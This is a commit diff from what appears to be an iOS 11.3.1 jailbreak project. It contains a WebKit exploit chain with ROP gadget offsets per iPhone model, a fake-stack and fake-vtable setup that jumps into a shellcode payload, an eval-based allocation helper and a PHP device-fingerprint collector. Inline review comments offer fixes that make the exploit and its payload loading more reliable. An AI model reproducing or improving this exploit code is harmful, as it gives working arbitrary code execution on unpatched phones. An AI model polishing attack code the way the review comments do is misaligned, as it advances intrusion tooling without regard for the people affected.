Bug fixes and improvements
MTJailed committed Jul 3, 2018
1 parent 4dff7a6 commit 85c88c9
Showing 6 changed files with 182 additions and 82 deletions.
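--- /dev/null
+++ b/analytics/analytics.php
@@ -0,0 +1,74 @@
+<?php
+
+class stdObject {
+public function __construct(array $arguments = array()) {
+if (!empty($arguments)) {
+foreach ($arguments as $property => $argument) {
+$this->{$property} = $argument;
+}
+}
+}
+
+public function __call($method, $arguments) {
+$arguments = array_merge(array("stdObject" => $this), $arguments); // Note: method argument 0 will always referred to the main class ($this).
+if (isset($this->{$method}) && is_callable($this->{$method})) {
+return call_user_func_array($this->{$method}, $arguments);
+} else {
+throw new Exception("Fatal error: Call to undefined method stdObject::{$method}()");
+}
+}
+}
+
+function REQUEST_IS_POST() {
+return isset($_SERVER) && isset($_SERVER['REQUEST_METHOD']) && $_SERVER['REQUEST_METHOD']=='POST';
+}
+
+function VALIDATE_REQUEST() {
+return $_POST['fingerprint'] != '' &&
+'' != $_POST['type'] &&
+'' != $_POST['os_vers'] &&
+'' != $_POST['os_build'] &&
+'' != $_POST['productname'] &&
+'' != $_POST['webkit_vers'] &&
+'' != $_POST['safari_vers'] &&
+'' != $_POST['locale'] &&
+'' != $_POST['timezone'];
+}
+
+try {
+if (REQUEST_IS_POST() && VALIDATE_REQUEST()){
+
+$device = new stdObject();
+
+function sanitize_input($data) {
+$data = trim($data);
+$data = stripslashes($data);
+$data = htmlspecialchars($data);
+return $data;
+}
+
+$device->fingerprint = sanitize_input($_POST['fingerprint']);
+$device->type = sanitize_input($_POST['type']);
+$device->productname = sanitize_input($_POST['productname']);
+$device->os_vers = sanitize_input($_POST['os_vers']);
+$device->os_build = sanitize_input($_POST['os_build']);
+$device->webkit_vers = sanitize_input($_POST['webkit_vers']);
+$device->safari_vers = sanitize_input($_POST['safari_vers']);
+$device->locale = sanitize_input($_POST['locale']);
+$device->timezone = sanitize_input($_POST['timezone']);
+$device->submission_time = round(microtime(true) * 1000);
+
+$data = file_get_contents('devices.json');
+$data = json_decode($data_old, true);
+$data[] = $device;
+$data_new = json_encode($data);
+$fp = fopen('devices.json', 'a+');
+fwrite($fp, $data_new);
+fclose($fp);
+header('Content-Type: application/json');
+echo $data_new;
+}
+} catch(Exception $e) {
+echo 'Oops something seems to have gone wrong: '.$e->getMessage().'\n';
+}
+?>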
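Review bot: The persistence block at the end of the hunk is broken: `$data = json_decode($data_old, true);` decodes an undefined `$data_old` instead of the `$data` just read from devices.json, so the existing records are discarded, and `fopen('devices.json', 'a+')` then appends a second JSON document instead of rewriting the file, leaving devices.json unparsable from the second submission on. `echo $data_new;` also answers every POST with the whole accumulated list, so each submitter receives every other device's fingerprint, locale and timezone; returning only the caller's own record is enough. `VALIDATE_REQUEST` indexes `$_POST` keys without checking they exist, so a missing field produces a notice instead of a clean rejection — `isset($_POST['fingerprint']) && $_POST['fingerprint'] !== ''` per field. If devices.json lives under the document root it is presumably fetchable directly as well, which is worth confirming in the server configuration. A rewrite of the read/write block is below.

```php
// … unchanged: stdObject, REQUEST_IS_POST, VALIDATE_REQUEST, sanitize_input and $device population …
$raw = file_exists('devices.json') ? file_get_contents('devices.json') : '';
$existing = json_decode($raw, true);
$data = is_array($existing) ? $existing : array();
$data[] = $device;
$data_new = json_encode($data);
// Rewrite the whole document under an exclusive lock rather than appending a second one.
file_put_contents('devices.json', $data_new, LOCK_EX);
header('Content-Type: application/json');
echo json_encode($device); // answer with the caller's own record only
```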
10 changes: 9 additions & 1 deletion modules/jsfree.module.js
@@ -1,4 +1,12 @@
//Function for freeing an object on the window, well sortof.
var JSFree = function(obj) {
window[obj] = undefined;
};
};

var JSAlloc = function size(name, size) {
if(typeof eval('window.'+name) !== 'undefined') return false;
eval('window.'+name+'=new Array('+size+');');
};

free = JSFree;
malloc = JSAlloc;
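Review bot: `JSAlloc` does its existence check and allocation through `eval('window.'+name)`, so whatever string arrives in `name` is executed as code, and the function's result is inconsistent (`false` on collision, `undefined` otherwise). Plain property access does the same job without eval: `if (typeof window[name] !== 'undefined') return false;` then `window[name] = new Array(size);` and `return true;`. The named function expression `function size(name, size)` uses `size` both as the function's name and as a parameter, which shadows confusingly; an anonymous expression or a distinct name avoids it. `free` and `malloc` are assigned without any declaration and so become implicit globals; `var free = JSFree;` (or an explicit `window.free = JSFree;`) makes the intent visible.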
12 changes: 6 additions & 6 deletions modules/offsets.module.js
Expand Up @@ -130,9 +130,9 @@ var Offsets = function Offsets(sw_vers, productname) {
jit_writeseperateheaps_func: 0x1b31a10c8,
usefastpermissions_jitcopy: 0x1b1bf0018,
ptr_stack_check_guard: 0x1b30f9ef8,
modelio_popx8: 0x18d2f6564,
modelio_popx8: 0x18d2f6574,
coreaudio_popx2: 0x18409ddbc,
linkcode_gadget: 0x187bd18c8
linkcode_gadget: 0x187bd187c
};

//iPhone 6S+
Expand Down Expand Up @@ -225,6 +225,7 @@ var Offsets = function Offsets(sw_vers, productname) {
//iPhone X
offsets["iPhone X"][11.31] = {
padding: 0x20,
vtable: 0x189c9a808,
disableprimitivegigacage: 0x18851a7d4,
g_gigacagebaseptrs: 0x1b1cb0000,
g_typedarraypoisons: 0x1b3281720,
Expand All @@ -236,10 +237,9 @@ var Offsets = function Offsets(sw_vers, productname) {
dlsym: 0x18084ef90,
longjmp: 0x180b12778,
callbacks: 0x1b3281698,
modelio_popx8: 0,
coreaudio_popx2: 0,
linkcode_gadget: 0,
vtable: 0
modelio_popx8: 0x18d2f6564,
coreaudio_popx2: 0x18409ddbc,
linkcode_gadget: 0x187bd18c8
};

//fixing up offsets that are the same accross devices, without having to allocate more memory for them.
166 changes: 92 additions & 74 deletions modules/sploit.1131.module.js
Expand Up @@ -11,28 +11,29 @@

using('verbosity');

//Configuration
var INTEGRITY_CHECKS = false; //enable this if you want to check the shellcode for integrity.

var UNITY = {
TEN: 10,
HUNDRED: 100,
THOUSAND: 1000,
MILLION: 1000000,
BILLION: 1000000000
};

_off = {};

ITERS = UNITY.TEN * UNITY.THOUSAND;
ALLOCS = UNITY.THOUSAND;
counter = 0;

//offsets
_off = {};

//Casting and types
var conversion_buffer = new ArrayBuffer(8);
var f64 = new Float64Array(conversion_buffer);
var i32 = new Uint32Array(conversion_buffer);
var BASE32 = 0x100000000;


//Initialisation of globals
var workbuf = new ArrayBuffer(0x1000000)
var u32_buffer = new Uint32Array(workbuf);
var u8_buffer = new Uint8Array(workbuf);
Expand Down Expand Up @@ -99,8 +100,10 @@ function trigger(constr, modify, res, val) {
`)
}


//The exploit
var pwn = function() {

_off = window.chosendevice.offsets;
console.log('Starting stage 1...');

Expand Down Expand Up @@ -188,9 +191,6 @@ var pwn = function() {
p3: 0xfffffff, // Butterfly indexing mask
};


if(verbosity === VERBOSITY.VERBOSE) print("Using padding: "+hex(FPO+0x8));

var fake_addr = stage1.addrof(outer) +FPO+0x8;

if(verbosity >= VERBOSITY.HIGH) print('fake object is at ' + hex(fake_addr));
Expand Down Expand Up @@ -284,6 +284,8 @@ var pwn = function() {
}

stage2.test();


if(verbosity === VERBOSITY.VERBOSE) print("Stage 2 test succeeded, continueing...");

var wrapper = document.createElement('div');
Expand Down Expand Up @@ -338,78 +340,94 @@ var pwn = function() {
+ '\njitWriteSeparateHeapsFunction @ ' + hex(jitWriteSeparateHeapsFunction)
+ '\nuseFastPermisionsJITCopy @ ' + hex(useFastPermisionsJITCopy)
);

//JIT Hardening stuff
if (!useFastPermisionsJITCopy || jitWriteSeparateHeapsFunction) {
// Probably an older phone, should be even easier
//fail(3);

//logic for older devices, credit goes to @idiidk
function legacy_execution() {

//See ExecutableAllocator.cpp on webkit
//jitWriteSeperateHeapsFunc
}

if(verbosity === VERBOSITY.VERBOSE) print("Setting up shellcode in memory...");

//Now set up our shellcode for code execution
var callback_vector = stage2.read64(callbacks);
function modern_execution() {

//Now set up our shellcode for code execution
var callback_vector = stage2.read64(callbacks);
var poison = stage2.read64(g_typedArrayPoisons + 6*8);
var buffer_addr = xor(stage2.read64(stage2.addrof(u32_buffer) + 0x18), poison);

var poison = stage2.read64(g_typedArrayPoisons + 6*8);
var buffer_addr = xor(stage2.read64(stage2.addrof(u32_buffer) + 0x18), poison);
var shellcode_src = buffer_addr + 0x4000;
var shellcode_dst = endOfFixedExecutableMemoryPool - 0x1000000;

var shellcode_src = buffer_addr + 0x4000;
var shellcode_dst = endOfFixedExecutableMemoryPool - 0x1000000;
if (shellcode_dst < startOfFixedExecutableMemoryPool) {
fail(4);
}

if (shellcode_dst < startOfFixedExecutableMemoryPool) {
fail(4);
stage2.write64(shellcode_src + 4, dlsym);

//set up our fake executable stack
var fake_stack = [
0,
shellcode_length, // x2
0,

pop_x8,

0, 0, 0, 0, 0,
shellcode_dst, // x8
0, 0, 0, 0,
stage2.read64(ptr_stack_check_guard) + 0x58,

linkcode_gadget,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,

shellcode_dst
];

// Set up fake vtable at offset 0
u32_buffer[0] = longjmp % BASE32;
u32_buffer[1] = longjmp / BASE32;

// Set up fake stack at offset 0x2000
for (var i = 0; i < fake_stack.length; ++i) {
u32_buffer[0x2000/4 + 2*i] = fake_stack[i] % BASE32;
u32_buffer[0x2000/4 + 2*i+1] = fake_stack[i] / BASE32;
}

//lets set up our code execution of the dylib payload
stage2.write_non_zero(el_addr, [
buffer_addr, // fake vtable
0,
shellcode_src, // x21
0, 0, 0, 0, 0, 0, 0,
0, // fp

pop_x2, // lr
0,
buffer_addr + 0x2000, // sp
]);
if (hex(stage2.read64(el_addr + 16)) === hex(shellcode_src)) {
print('shellcode is at: ' + hex(shellcode_dst));
} else {
fail('Failed writing shellcode');
return false;
}
}

stage2.write64(shellcode_src + 4, dlsym);

//set up our fake executable stack
var fake_stack = [
0,
shellcode_length, // x2
0,

pop_x8,

0, 0, 0, 0, 0,
shellcode_dst, // x8
0, 0, 0, 0,
stage2.read64(ptr_stack_check_guard) + 0x58,

linkcode_gadget,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,

shellcode_dst
];

// Set up fake vtable at offset 0
u32_buffer[0] = longjmp % BASE32;
u32_buffer[1] = longjmp / BASE32;

// Set up fake stack at offset 0x2000
for (var i = 0; i < fake_stack.length; ++i) {
u32_buffer[0x2000/4 + 2*i] = fake_stack[i] % BASE32;
u32_buffer[0x2000/4 + 2*i+1] = fake_stack[i] / BASE32;
//JIT Hardening stuff
if (!useFastPermisionsJITCopy || jitWriteSeparateHeapsFunction) {
//legacy_execution();
modern_execution(); //just for fun
} else {
modern_execution();
}

//lets set up our code execution of the dylib payload
stage2.write_non_zero(el_addr, [
buffer_addr, // fake vtable
0,
shellcode_src, // x21
0, 0, 0, 0, 0, 0, 0,
0, // fp

pop_x2, // lr
0,
buffer_addr + 0x2000, // sp
]);

//if(verbosity >= VERBOSITY.HIGH) print('shellcode is at ' + hex(shellcode_dst));
if(verbosity >= VERBOSITY.DEFAULT) print('EmptyList is started, please close all background apps then dismiss this alert.');

if(verbosity >= VERBOSITY.DEFAULT) print('EmptyList is started, please close all background apps then dismiss this alert.');
wrapper.addEventListener('click', function(){}); //execute the shellcode
return true;
};


function integrity_checks(buffer) {
if(INTEGRITY_CHECKS) {
var shellcode_data = new Uint8Array(buffer);
Expand All @@ -422,11 +440,11 @@ function integrity_checks(buffer) {
};

if(
shellcode_hashes.md5 !== "5b8d489beb89a7515dc7fb5ee2f4092d" ||
shellcode_hashes.sha1 !== "5d97f3843c1a3b88c7a95dae803b46e07a67d3ed" ||
shellcode_hashes.sha256 !== "a4a3254bc86d5b2030c0637173b927a489b98d1d29fcfcc8232636eec94a2fe8" ||
shellcode_hashes.sha384 !== "78791343c427ddd51c1bc236f77bafc4cfef04796f931d856e6652aadedb5ab54e46fe9b05e98ce7dc982eba9f1c6220" ||
shellcode_hashes.sha512 !== "ef48614b78b42be7bedb79a7aa768eb19ad8fb05cefac2d68c8d74ab6a95d77aa1054d255294b5bf7e9ece648ac916fa8999e79aa93a707732b9850418bd0053"
shellcode_hashes.md5 !== "4a7cb4df072782a2a0273593b96f5278" ||
shellcode_hashes.sha1 !== "1fdbc8b15b25819eb8403e402ca7f32f489ff01d" ||
shellcode_hashes.sha256 !== "2d3d35db971e0697aaacc56ffc2af2967609f3c016a9de180b2ba9a4adbb74d0" ||
shellcode_hashes.sha384 !== "f277af627fceec928b6579ac67c8173abde382ed836f13416a1c3e215d3928cd79bcbd53b9b7fef2188a5afeec80034c" ||
shellcode_hashes.sha512 !== "e4c01d654f1f33002da2033c8eb9509e7fb2f5275d7fc4dfd49fd420cf76da6b3b712df4e0c35e51e66c9c5249a3c7146c14e01242db77673a747e73ef649bdc"
) throw new Error('Shellcode integrity check failed.');
}
}
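Review bot: The refreshed digests in the last hunk are only compared when `INTEGRITY_CHECKS` is true, and the first hunk of this file keeps `var INTEGRITY_CHECKS = false;`, so the binary payload replaced in this same commit is loaded unverified by default and a corrupted or substituted payloads/11_3_1/emptylist.bin would pass unnoticed. Nothing ties the five hash literals to the file they pin; a comment above the comparison such as `// Expected digests of payloads/11_3_1/emptylist.bin; regenerate whenever the binary changes.` keeps them in step, and defaulting the flag to true (leaving it available to skip the check) would make the check actually protective. In the `pwn` hunk, both branches of `if (!useFastPermisionsJITCopy || jitWriteSeparateHeapsFunction)` call `modern_execution()` and `legacy_execution` has an empty body, so the branch and the `//just for fun` comment are dead code; either drop the stub or state in a comment why the legacy path is intentionally disabled. `ITERS`, `ALLOCS` and `counter` in the first hunk are assigned without `var` and become implicit globals. `pwn` begins and ends outside the hunks shown here.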
2 changes: 1 addition & 1 deletion modules/sploit.module.js
Expand Up @@ -172,7 +172,7 @@ function strategy_select() {
else if(osversion_between(11.3, 11.31)) {

//We firstly need to check if the client's device model is of one that this strategy supports
var supported_devices = ["iPhone 8", "iPhone 8+", "iPhone 6S", "iPhone 6+", "iPhone 5S"];
var supported_devices = ["iPhone X", "iPhone 8", "iPhone 8+", "iPhone 6S", "iPhone 6+", "iPhone 5S"];
var supported = false;

if(!device.ProductName) return false; //Sanity check making sure to only continue if the product name of the device was detected
Binary file modified payloads/11_3_1/emptylist.bin
